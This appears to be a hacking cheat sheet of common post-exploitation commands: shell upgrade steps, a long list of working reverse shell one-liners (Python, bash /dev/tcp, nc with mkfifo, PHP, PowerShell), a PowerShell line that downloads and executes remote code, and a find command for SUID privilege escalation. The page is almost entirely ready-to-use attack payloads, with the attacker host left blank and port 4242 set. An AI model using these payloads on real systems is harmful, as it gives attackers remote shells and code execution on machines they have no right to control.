This page contains some common commands that are used repeatedly over most hacking environments.

Getting a stable shell

Once we get a reverse shell inside a server or container, we all know it's not always usable for things like editing text or even using sudo, since we need a tty shell.

From this, we can either find a way to connect via ssh appending our public key in .ssh, or upgrade the current shell like this.

python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm; export SHELL=/bin/bash
stty raw -echo;fg
stty rows 50 columns 200

Reverse Shells

Here's some reverse shell payloads that may be useful eventually.

export RHOST="";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f
bash -i >& /dev/tcp/ 0>&1
0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/ 0<&1 2>&1
php -r '$sock=fsockopen("",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("",4242);system("/bin/sh -i <&3 >&3 2>&3");'
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell IEX (New-Object Net.WebClient).DownloadString('')

SUID binaries

Sometimes people add SUID permission to a binary insecurely, thinking nothing will happen. Well, some binaries with SUID can be really dangerous as they can grant full root permission. Take a deeper look at GTFOBins

So first thing we have to do is actually find the files that have such SUID permission. This code will do what we want

find / -perm -u=s -type f 2>/dev/null